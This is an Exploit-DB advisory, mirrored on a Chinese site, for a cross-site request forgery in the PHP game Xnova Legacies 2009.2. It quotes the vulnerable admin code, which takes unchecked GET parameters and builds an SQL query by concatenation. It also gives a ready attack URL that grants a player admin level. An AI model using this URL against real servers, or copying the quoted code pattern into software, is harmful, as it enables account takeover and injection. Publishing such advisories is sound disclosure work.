Xnova Legacies 2009.2 – Cross-Site Request Forgery - 体验盒子

作者： Xploit A Day

日期： 2011-01-26

类别：

webapps

平台：

php

来源：https://www.exploit-db.com/exploits/16059/

1

2

3

4

5

6

7

8

9

10

11

12

13

14

15

16

17

18

19

20

21

22

23

24

25

26

27

28

29

# Exploit Title: Xnova Legacies 2009.2 CSRF

# Date: 27/1/2011

# Author: @xploitaday

# Software Homepage: http://www.xnova-ng.org/

# Software Link: http://downloads.tuxfamily.org/xnlegacies/releases/xnova-legacies_2009.2.tar.gz

# Version: 2009.2

Vuln file: admin/paneladmina.php

Vuln Lines:

108-117

case 'usr_level':

$Player = $_GET['player'];

$NewLvl = $_GET['authlvl'];

$QryUpdate= doquery("UPDATE {{table}} SET <code>authlevel</code> = '".$NewLvl."' WHERE <code>username</code> = '".$Player."';", 'users');

$Message= $lang['adm_mess_lvl1']. " ". $Player ." ".$lang['adm_mess_lvl2'];

$Message .= "<font color=\"red\">".$lang['adm_usr_level'][ $NewLvl ]."</font>!";

AdminMessage ( $Message, $lang['adm_mod_level'] );

break;

Description:

If you are a moderator, you can set you admin.

And if an admin visit this link, you be will granted with admin privileges (control of game)

Replace SERVER and PLAYER with yours

Attack url: http://SERVER/admin/paneladmina.php?result=usr_level&player=PLAYER&authlvl=3